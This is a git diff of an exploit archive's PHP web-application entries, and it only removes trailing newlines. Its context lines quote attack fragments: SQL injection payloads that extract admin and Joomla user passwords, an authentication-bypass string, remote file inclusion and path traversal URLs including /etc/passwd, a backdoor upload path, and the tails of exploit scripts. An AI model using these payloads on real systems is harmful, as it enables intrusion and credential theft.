a/platforms/php/webapps/42173.txt b/platforms/php/webapps/42173.txt index a8791100e..d17438529 100755 --- a/platforms/php/webapps/42173.txt +++ b/platforms/php/webapps/42173.txt @@ -48,5 +48,4 @@ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429 - - + \ No newline at end of file diff --git a/platforms/php/webapps/4219.txt b/platforms/php/webapps/4219.txt index f3e899d71..1b23c261b 100755 --- a/platforms/php/webapps/4219.txt +++ b/platforms/php/webapps/4219.txt @@ -36,4 +36,4 @@ Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la --------------------------------------------------------------------- -# milw0rm.com [2007-07-24] +# milw0rm.com [2007-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/4220.pl b/platforms/php/webapps/4220.pl index 5939adfd8..b0bdebf16 100755 --- a/platforms/php/webapps/4220.pl +++ b/platforms/php/webapps/4220.pl @@ -112,4 +112,4 @@ while($cmd !~ "q") { $cmd = ; } -# milw0rm.com [2007-07-24] +# milw0rm.com [2007-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/42205.html b/platforms/php/webapps/42205.html index eef414efb..f1e6a6623 100755 --- a/platforms/php/webapps/42205.html +++ b/platforms/php/webapps/42205.html @@ -57,4 +57,4 @@ https://github.com/robiso/wondercms/issues/36 Credits & Authors: ------------------ Zerox Security Lab ---> +--> \ No newline at end of file diff --git a/platforms/php/webapps/4221.txt b/platforms/php/webapps/4221.txt index 73d9f32ef..b60a044eb 100755 --- a/platforms/php/webapps/4221.txt +++ b/platforms/php/webapps/4221.txt @@ -9,4 +9,4 @@ greetz:d3hydr8, whoami #pace -# milw0rm.com [2007-07-24] +# milw0rm.com [2007-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/42221.py b/platforms/php/webapps/42221.py index 2697771fe..9338a8709 100755 --- a/platforms/php/webapps/42221.py +++ b/platforms/php/webapps/42221.py @@ -158,4 +158,4 @@ data = urllib.urlencode(post_fields) req = urllib2.Request(CONTACT_SCRIPT_URL, data) send_request(req) -print "\033[1;32m[+] You should check your listener and cross the fingers ;)\033[0m\n" +print "\033[1;32m[+] You should check your listener and cross the fingers ;)\033[0m\n" \ No newline at end of file diff --git a/platforms/php/webapps/4224.txt b/platforms/php/webapps/4224.txt index 95dbe06ca..e8e49facb 100755 --- a/platforms/php/webapps/4224.txt +++ b/platforms/php/webapps/4224.txt @@ -78,4 +78,4 @@ Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin -# milw0rm.com [2007-07-25] +# milw0rm.com [2007-07-25] \ No newline at end of file diff --git a/platforms/php/webapps/4225.txt b/platforms/php/webapps/4225.txt index 9d68fb273..c6490ba50 100755 --- a/platforms/php/webapps/4225.txt +++ b/platforms/php/webapps/4225.txt @@ -13,4 +13,4 @@ Vul Code: "$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " . "cat_id=" . fnpreparesql($_GET['cat_id']);" -# milw0rm.com [2007-07-25] +# milw0rm.com [2007-07-25] \ No newline at end of file diff --git a/platforms/php/webapps/42262.txt b/platforms/php/webapps/42262.txt index 14766ea79..0840a29e4 100755 --- a/platforms/php/webapps/42262.txt +++ b/platforms/php/webapps/42262.txt @@ -52,4 +52,4 @@ critical point, as BIG5 will see the string ø\ as a single asian character encoded on two bytes. As the single quote isn't escaped anymore, the SQL code will be executed and will set the password of every accounts to the value -61529519452809720693702583126814 (=MD5 hash of "ximaz" string) +61529519452809720693702583126814 (=MD5 hash of "ximaz" string) \ No newline at end of file diff --git a/platforms/php/webapps/42291.txt b/platforms/php/webapps/42291.txt index 86e73c025..9002a7a89 100755 --- a/platforms/php/webapps/42291.txt +++ b/platforms/php/webapps/42291.txt @@ -56,4 +56,4 @@ Timeline Discovered By: ===================== -Manich Koomsusi +Manich Koomsusi \ No newline at end of file diff --git a/platforms/php/webapps/42330.txt b/platforms/php/webapps/42330.txt index b0f0fe18b..79eec5672 100755 --- a/platforms/php/webapps/42330.txt +++ b/platforms/php/webapps/42330.txt @@ -36,4 +36,4 @@ Look at an image profile url, it is something like this http://localhost/oranges To copy add variable dest, so it will be like this http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100&dest=hacked.php It will copy file a6ebd6bd62ba537f37b7b8ac40aa626d.png into hacked.php that will be stored in users/image_thumb/hacked.php Conditions : -- variable sizex and sizey must be the real width and height of file a6ebd6bd62ba537f37b7b8ac40aa626d.png (in this example) +- variable sizex and sizey must be the real width and height of file a6ebd6bd62ba537f37b7b8ac40aa626d.png (in this example) \ No newline at end of file diff --git a/platforms/php/webapps/42347.txt b/platforms/php/webapps/42347.txt index 85b55efce..d1a2c290b 100755 --- a/platforms/php/webapps/42347.txt +++ b/platforms/php/webapps/42347.txt @@ -15,4 +15,4 @@ sqlmap.py -u "http://localhost/[PATH]/search/results.html" -p search_author --da Parameter: search_author (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace - Payload: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient= + Payload: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient= \ No newline at end of file diff --git a/platforms/php/webapps/4235.txt b/platforms/php/webapps/4235.txt index 9b15d2e4e..e44203c1a 100755 --- a/platforms/php/webapps/4235.txt +++ b/platforms/php/webapps/4235.txt @@ -24,4 +24,4 @@ # ...and thanks str0ke -# milw0rm.com [2007-07-27] +# milw0rm.com [2007-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/42351.txt b/platforms/php/webapps/42351.txt index e57873eb2..3a4996a03 100755 --- a/platforms/php/webapps/42351.txt +++ b/platforms/php/webapps/42351.txt @@ -49,4 +49,4 @@ Parameter: id (GET) Credits & Authors: ================== -8bitsec - [https://twitter.com/_8bitsec] +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/42359.txt b/platforms/php/webapps/42359.txt index b0b573434..d30518a26 100755 --- a/platforms/php/webapps/42359.txt +++ b/platforms/php/webapps/42359.txt @@ -61,4 +61,4 @@ CÔNG TY CÔNG NGHỆ BẢO TÍN Email này đã được quét bằng tính năng bảo vệ diệt vi-rút của BullGuard. -Để biết thêm thông tin, hãy truy cập www.bullguard.com +Để biết thêm thông tin, hãy truy cập www.bullguard.com \ No newline at end of file diff --git a/platforms/php/webapps/42379.txt b/platforms/php/webapps/42379.txt index 3f9e3b053..a8505b59f 100755 --- a/platforms/php/webapps/42379.txt +++ b/platforms/php/webapps/42379.txt @@ -22,4 +22,4 @@ Navigate to scripts admin login page and submit admin' or ''='-- for username and it should give you access to the admin area. A quick release to -kick off DefCon festivities. See you there! Enjoy >:) +kick off DefCon festivities. See you there! Enjoy >:) \ No newline at end of file diff --git a/platforms/php/webapps/4238.txt b/platforms/php/webapps/4238.txt index 68f5f0080..ffa8f70cc 100755 --- a/platforms/php/webapps/4238.txt +++ b/platforms/php/webapps/4238.txt @@ -26,4 +26,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ Adult Directory SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-27] +# milw0rm.com [2007-07-27] \ No newline at end of file diff --git a/platforms/php/webapps/42383.html b/platforms/php/webapps/42383.html index 56173d837..bc378ec2e 100755 --- a/platforms/php/webapps/42383.html +++ b/platforms/php/webapps/42383.html @@ -14,4 +14,4 @@ PROOF OF CONCEPT: - + \ No newline at end of file diff --git a/platforms/php/webapps/42387.txt b/platforms/php/webapps/42387.txt index a5f3f38b7..a9c03599a 100755 --- a/platforms/php/webapps/42387.txt +++ b/platforms/php/webapps/42387.txt @@ -41,4 +41,4 @@ Parameter: sbid (GET) Title: Generic UNION query (NULL) - 10 columns Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) - Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu) + Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu) \ No newline at end of file diff --git a/platforms/php/webapps/42403.txt b/platforms/php/webapps/42403.txt index c28247994..bee6900d6 100755 --- a/platforms/php/webapps/42403.txt +++ b/platforms/php/webapps/42403.txt @@ -23,4 +23,4 @@ and it should give you access to the admin area or Customer Area. Regards. -Touhid Shaikh +Touhid Shaikh \ No newline at end of file diff --git a/platforms/php/webapps/42404.txt b/platforms/php/webapps/42404.txt index 08ab96e6d..51a6a388e 100755 --- a/platforms/php/webapps/42404.txt +++ b/platforms/php/webapps/42404.txt @@ -105,4 +105,4 @@ http://192.168.1.13/upload/backdoor.php Enjoy ! Regards. -Touhid Shaikh +Touhid Shaikh \ No newline at end of file diff --git a/platforms/php/webapps/4241.txt b/platforms/php/webapps/4241.txt index 4e456fac8..358fc9de4 100755 --- a/platforms/php/webapps/4241.txt +++ b/platforms/php/webapps/4241.txt @@ -30,4 +30,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org ! --==+ PHP123 Top Sites SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-28] +# milw0rm.com [2007-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/42412.txt b/platforms/php/webapps/42412.txt index b19558aec..08037ada3 100755 --- a/platforms/php/webapps/42412.txt +++ b/platforms/php/webapps/42412.txt @@ -6,6 +6,4 @@ Exploit : -http://site.com/[path]/product_view1.php?pid=-99999+[SQL+Command] - - +http://site.com/[path]/product_view1.php?pid=-99999+[SQL+Command] \ No newline at end of file diff --git a/platforms/php/webapps/42419.txt b/platforms/php/webapps/42419.txt index e865723b5..34960a618 100755 --- a/platforms/php/webapps/42419.txt +++ b/platforms/php/webapps/42419.txt @@ -17,4 +17,4 @@ Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: http://localhost/server/1 AND SLEEP(5) ---- +--- \ No newline at end of file diff --git a/platforms/php/webapps/4242.php b/platforms/php/webapps/4242.php index cd4826b15..7cf842e66 100755 --- a/platforms/php/webapps/4242.php +++ b/platforms/php/webapps/4242.php @@ -236,4 +236,4 @@ while (!strpos($user, chr(0))) print "\n\n[-] Successfull!\n"; ?> -# milw0rm.com [2007-07-29] +# milw0rm.com [2007-07-29] \ No newline at end of file diff --git a/platforms/php/webapps/42420.txt b/platforms/php/webapps/42420.txt index 9316044f9..13e74d877 100755 --- a/platforms/php/webapps/42420.txt +++ b/platforms/php/webapps/42420.txt @@ -41,4 +41,4 @@ _SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&action=Search Payload: Query=Test%' UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a7671,0x4d715 07376585366416c53467453544e687853795747574a627351635357467676616366706e6355,0x71 71767871),NULL,NULL-- SXjD&action=Search ---- +--- \ No newline at end of file diff --git a/platforms/php/webapps/42421.txt b/platforms/php/webapps/42421.txt index 8ef106103..f5bc07720 100755 --- a/platforms/php/webapps/42421.txt +++ b/platforms/php/webapps/42421.txt @@ -28,4 +28,4 @@ Parameter: q (GET) Payload: q=test' UNION ALL SELECT NULL,CONCAT(CONCAT('qqpzq','lHGBmBgXqPlXdk uRCaimornRFWRUtWPKLWYLzQeK'),'qqvvq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL-- Gqvt ---- +--- \ No newline at end of file diff --git a/platforms/php/webapps/42440.txt b/platforms/php/webapps/42440.txt index e51589231..1257f6c7f 100755 --- a/platforms/php/webapps/42440.txt +++ b/platforms/php/webapps/42440.txt @@ -32,4 +32,4 @@ # http://localhost/[PATH]/web-file-explorer/download.php?id=WebExplorer/[FILE] # # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42447.txt b/platforms/php/webapps/42447.txt index 0ffd50833..b3823901b 100755 --- a/platforms/php/webapps/42447.txt +++ b/platforms/php/webapps/42447.txt @@ -37,4 +37,4 @@ # -1'++/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x))--+- # # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42458.txt b/platforms/php/webapps/42458.txt index 2469addb7..6ddb09e48 100755 --- a/platforms/php/webapps/42458.txt +++ b/platforms/php/webapps/42458.txt @@ -23,6 +23,4 @@ # '+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''=' # # Etc... -# # # # # - - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4246.txt b/platforms/php/webapps/4246.txt index 0c39e32fd..1bd019954 100755 --- a/platforms/php/webapps/4246.txt +++ b/platforms/php/webapps/4246.txt @@ -42,4 +42,4 @@ all member echo.or.id ----------------------- tidak lupa untuk anavrin[semangat kerja bro], dan ical yang baru sembuh -# milw0rm.com [2007-07-30] +# milw0rm.com [2007-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/4248.txt b/platforms/php/webapps/4248.txt index 85ba07f85..65f411725 100755 --- a/platforms/php/webapps/4248.txt +++ b/platforms/php/webapps/4248.txt @@ -5,4 +5,4 @@ Found: Cyber-Security Exploit: index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* -# milw0rm.com [2007-07-31] +# milw0rm.com [2007-07-31] \ No newline at end of file diff --git a/platforms/php/webapps/42482.txt b/platforms/php/webapps/42482.txt index 2b8fc7bd8..f1c880886 100755 --- a/platforms/php/webapps/42482.txt +++ b/platforms/php/webapps/42482.txt @@ -26,4 +26,4 @@ # http://localhost/[PATH]/search1det.php?action=orderFullDetails&orderid=[SQL] # # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42524.txt b/platforms/php/webapps/42524.txt index 1b2f4ef9a..f1b38db2e 100755 --- a/platforms/php/webapps/42524.txt +++ b/platforms/php/webapps/42524.txt @@ -24,4 +24,4 @@ # 811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42525.txt b/platforms/php/webapps/42525.txt index e6290b289..cfc9aecc3 100755 --- a/platforms/php/webapps/42525.txt +++ b/platforms/php/webapps/42525.txt @@ -24,4 +24,4 @@ # 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 # # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4253.pl b/platforms/php/webapps/4253.pl index 50074614d..15b0461a9 100755 --- a/platforms/php/webapps/4253.pl +++ b/platforms/php/webapps/4253.pl @@ -38,4 +38,4 @@ print "\n [-] Site is not vulnerable !"; exit(); } -# milw0rm.com [2007-08-02] +# milw0rm.com [2007-08-02] \ No newline at end of file diff --git a/platforms/php/webapps/42535.txt b/platforms/php/webapps/42535.txt index adc386093..63915cb5a 100755 --- a/platforms/php/webapps/42535.txt +++ b/platforms/php/webapps/42535.txt @@ -65,4 +65,4 @@ p:33 后台直接取出content参数,数据并未进行转义操作。 -EXP: “><“‘ +EXP: “><“‘ \ No newline at end of file diff --git a/platforms/php/webapps/4254.txt b/platforms/php/webapps/4254.txt index e7278208c..1e3102a5f 100755 --- a/platforms/php/webapps/4254.txt +++ b/platforms/php/webapps/4254.txt @@ -44,4 +44,4 @@ all member www.kecoak-elektronik.net ----------------------- semua komunitas hacker&security Indonesia -# milw0rm.com [2007-08-05] +# milw0rm.com [2007-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/4256.pl b/platforms/php/webapps/4256.pl index 21e61e1da..50412aa2d 100755 --- a/platforms/php/webapps/4256.pl +++ b/platforms/php/webapps/4256.pl @@ -45,4 +45,4 @@ print "\n [-] Exploit gagal :( - cari yang lain!"; exit(); } -# milw0rm.com [2007-08-05] +# milw0rm.com [2007-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/4258.txt b/platforms/php/webapps/4258.txt index 31ed244d7..18b20f735 100755 --- a/platforms/php/webapps/4258.txt +++ b/platforms/php/webapps/4258.txt @@ -42,4 +42,4 @@ iFX, matdhule, nyubi, x-ace, and to all my friend ----------------------- Sedih ngga bisa ikut PANHAC, titip salam aja buat temen2 yang ikut PANHAC -# milw0rm.com [2007-08-06] +# milw0rm.com [2007-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/4265.txt b/platforms/php/webapps/4265.txt index ec24d854f..a4d09527b 100755 --- a/platforms/php/webapps/4265.txt +++ b/platforms/php/webapps/4265.txt @@ -29,4 +29,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org ! --==+ Prozilla Pub Site Directory SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-08-06] +# milw0rm.com [2007-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/4267.txt b/platforms/php/webapps/4267.txt index f0ef57c23..93aa74289 100755 --- a/platforms/php/webapps/4267.txt +++ b/platforms/php/webapps/4267.txt @@ -85,4 +85,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2007-08-07] +# milw0rm.com [2007-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/4268.txt b/platforms/php/webapps/4268.txt index 0147940af..aa385793c 100755 --- a/platforms/php/webapps/4268.txt +++ b/platforms/php/webapps/4268.txt @@ -82,4 +82,4 @@ __________?????______??????_________________________ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-08-07] +# milw0rm.com [2007-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/4269.txt b/platforms/php/webapps/4269.txt index e9fb92d71..09cf49751 100755 --- a/platforms/php/webapps/4269.txt +++ b/platforms/php/webapps/4269.txt @@ -73,4 +73,4 @@ CODE #####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..############################## ############################################################################################## -# milw0rm.com [2007-08-07] +# milw0rm.com [2007-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/4271.txt b/platforms/php/webapps/4271.txt index 04518ee1f..f943a33c8 100755 --- a/platforms/php/webapps/4271.txt +++ b/platforms/php/webapps/4271.txt @@ -19,4 +19,4 @@ bug Script: bug found: "/fishcart_v3/fc_functions/fc_example.php?docroot=[shell]" -# milw0rm.com [2007-08-08] +# milw0rm.com [2007-08-08] \ No newline at end of file diff --git a/platforms/php/webapps/4273.txt b/platforms/php/webapps/4273.txt index d2892db83..4a22d6c3f 100755 --- a/platforms/php/webapps/4273.txt +++ b/platforms/php/webapps/4273.txt @@ -13,4 +13,4 @@ require("$adminfolder/sources/datelib.php"); bug found: "http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]" -# milw0rm.com [2007-08-09] +# milw0rm.com [2007-08-09] \ No newline at end of file diff --git a/platforms/php/webapps/4275.php b/platforms/php/webapps/4275.php index 4ee61bc9c..3ccaa9124 100755 --- a/platforms/php/webapps/4275.php +++ b/platforms/php/webapps/4275.php @@ -151,4 +151,4 @@ echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; echo "DEVIL TEAM HOME: http://devilteam.eu/\r\n"; ?> -# milw0rm.com [2007-08-10] +# milw0rm.com [2007-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/4276.txt b/platforms/php/webapps/4276.txt index 90af1cf9a..37c4ce367 100755 --- a/platforms/php/webapps/4276.txt +++ b/platforms/php/webapps/4276.txt @@ -14,4 +14,4 @@ Vulnerability: http://127.0.0.1/~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=[evil_code?] -# milw0rm.com [2007-08-10] +# milw0rm.com [2007-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/4277.php b/platforms/php/webapps/4277.php index 40990649e..55a0947b1 100755 --- a/platforms/php/webapps/4277.php +++ b/platforms/php/webapps/4277.php @@ -356,4 +356,4 @@ echo "Cant find evil file :/ maybe this version script is too old but is not echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; ?> -# milw0rm.com [2007-08-10] +# milw0rm.com [2007-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/4278.txt b/platforms/php/webapps/4278.txt index e7172de28..5d48fb7b2 100755 --- a/platforms/php/webapps/4278.txt +++ b/platforms/php/webapps/4278.txt @@ -28,4 +28,4 @@ PoC : http://www.example.com/pixlie.php?root=../../../../../etc/passwd%00 -# milw0rm.com [2007-08-10] +# milw0rm.com [2007-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/4282.txt b/platforms/php/webapps/4282.txt index 083ac37fb..f2b11be31 100755 --- a/platforms/php/webapps/4282.txt +++ b/platforms/php/webapps/4282.txt @@ -28,4 +28,4 @@ http://???/go/_files/?file=./.././.././.././go/_files/index.php Discovered by dun 2007.08.11 -# milw0rm.com [2007-08-13] +# milw0rm.com [2007-08-13] \ No newline at end of file diff --git a/platforms/php/webapps/4284.txt b/platforms/php/webapps/4284.txt index 72c737a54..f604d281d 100755 --- a/platforms/php/webapps/4284.txt +++ b/platforms/php/webapps/4284.txt @@ -27,4 +27,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org ! --== Prozilla Webring Website Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-08-13] +# milw0rm.com [2007-08-13] \ No newline at end of file diff --git a/platforms/php/webapps/4291.txt b/platforms/php/webapps/4291.txt index dc4ecca6f..c78721d43 100755 --- a/platforms/php/webapps/4291.txt +++ b/platforms/php/webapps/4291.txt @@ -43,4 +43,4 @@ Game search result for \')/**/union/**/....... That means that the exploit failed. # -# milw0rm.com [2007-08-16] +# milw0rm.com [2007-08-16] \ No newline at end of file diff --git a/platforms/php/webapps/4295.txt b/platforms/php/webapps/4295.txt index fc65fc20f..05119088e 100755 --- a/platforms/php/webapps/4295.txt +++ b/platforms/php/webapps/4295.txt @@ -9,4 +9,4 @@ Exploit : squirrelcart//popup_window.php?site_isp_root=http://example.co notes : register_globals = off is needed it seems. -# milw0rm.com [2007-08-19] +# milw0rm.com [2007-08-19] \ No newline at end of file diff --git a/platforms/php/webapps/4296.txt b/platforms/php/webapps/4296.txt index 013869678..46e84cdbd 100755 --- a/platforms/php/webapps/4296.txt +++ b/platforms/php/webapps/4296.txt @@ -33,4 +33,4 @@ all member www.kecoak-elektronik.net ----------------------- semua komunitas hacker&security Indonesia -# milw0rm.com [2007-08-20] +# milw0rm.com [2007-08-20] \ No newline at end of file diff --git a/platforms/php/webapps/430.txt b/platforms/php/webapps/430.txt index 086348030..a647e54fb 100755 --- a/platforms/php/webapps/430.txt +++ b/platforms/php/webapps/430.txt @@ -151,4 +151,4 @@ return $data; ?> -# milw0rm.com [2004-09-01] +# milw0rm.com [2004-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/4300.txt b/platforms/php/webapps/4300.txt index a9b600b6e..e6bbbe569 100755 --- a/platforms/php/webapps/4300.txt +++ b/platforms/php/webapps/4300.txt @@ -35,4 +35,4 @@ all member www.kecoak-elektronik.net semua komunitas hacker&security Indonesia cintailah bahasa Indonesia -# milw0rm.com [2007-08-21] +# milw0rm.com [2007-08-21] \ No newline at end of file diff --git a/platforms/php/webapps/4305.txt b/platforms/php/webapps/4305.txt index d04f7fbfc..96cbae172 100755 --- a/platforms/php/webapps/4305.txt +++ b/platforms/php/webapps/4305.txt @@ -26,4 +26,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-08-23] +# milw0rm.com [2007-08-23] \ No newline at end of file diff --git a/platforms/php/webapps/4306.txt b/platforms/php/webapps/4306.txt index f6b29806f..382b9e26b 100755 --- a/platforms/php/webapps/4306.txt +++ b/platforms/php/webapps/4306.txt @@ -25,4 +25,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-08-23] +# milw0rm.com [2007-08-23] \ No newline at end of file diff --git a/platforms/php/webapps/4307.txt b/platforms/php/webapps/4307.txt index f6b580340..b1c26fe9b 100755 --- a/platforms/php/webapps/4307.txt +++ b/platforms/php/webapps/4307.txt @@ -26,4 +26,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-08-23] +# milw0rm.com [2007-08-23] \ No newline at end of file diff --git a/platforms/php/webapps/4308.txt b/platforms/php/webapps/4308.txt index 5f0d5022b..271e25ff1 100755 --- a/platforms/php/webapps/4308.txt +++ b/platforms/php/webapps/4308.txt @@ -25,4 +25,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-08-23] +# milw0rm.com [2007-08-23] \ No newline at end of file diff --git a/platforms/php/webapps/4309.txt b/platforms/php/webapps/4309.txt index f4706b3c5..4247fc9e1 100755 --- a/platforms/php/webapps/4309.txt +++ b/platforms/php/webapps/4309.txt @@ -25,4 +25,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-08-23] +# milw0rm.com [2007-08-23] \ No newline at end of file diff --git a/platforms/php/webapps/4310.txt b/platforms/php/webapps/4310.txt index 7ba2db835..e5b49694e 100755 --- a/platforms/php/webapps/4310.txt +++ b/platforms/php/webapps/4310.txt @@ -76,4 +76,4 @@ -# milw0rm.com [2007-08-23] +# milw0rm.com [2007-08-23] \ No newline at end of file diff --git a/platforms/php/webapps/4313.pl b/platforms/php/webapps/4313.pl index dc14e4dea..d754357e5 100755 --- a/platforms/php/webapps/4313.pl +++ b/platforms/php/webapps/4313.pl @@ -105,4 +105,4 @@ sub istrue2 return 0; } } -# milw0rm.com [2007-08-25] +# milw0rm.com [2007-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/4317.txt b/platforms/php/webapps/4317.txt index 1fc4514ed..6b61a4e0b 100755 --- a/platforms/php/webapps/4317.txt +++ b/platforms/php/webapps/4317.txt @@ -30,4 +30,4 @@ Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32 ####The 18 years old, german Hacker bd0rk#### -# milw0rm.com [2007-08-26] +# milw0rm.com [2007-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/4320.txt b/platforms/php/webapps/4320.txt index fd4fea880..f038f98be 100755 --- a/platforms/php/webapps/4320.txt +++ b/platforms/php/webapps/4320.txt @@ -21,4 +21,4 @@ if ($start) { http://www.site.com/admin/system/include.php?skindir=[evilCode] http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode] -# milw0rm.com [2007-08-27] +# milw0rm.com [2007-08-27] \ No newline at end of file diff --git a/platforms/php/webapps/4326.txt b/platforms/php/webapps/4326.txt index 7637633c0..a9457c540 100755 --- a/platforms/php/webapps/4326.txt +++ b/platforms/php/webapps/4326.txt @@ -54,4 +54,4 @@ Your script should filter metacharacters from user input. Vendor was contacted by email and didn't not replied. -# 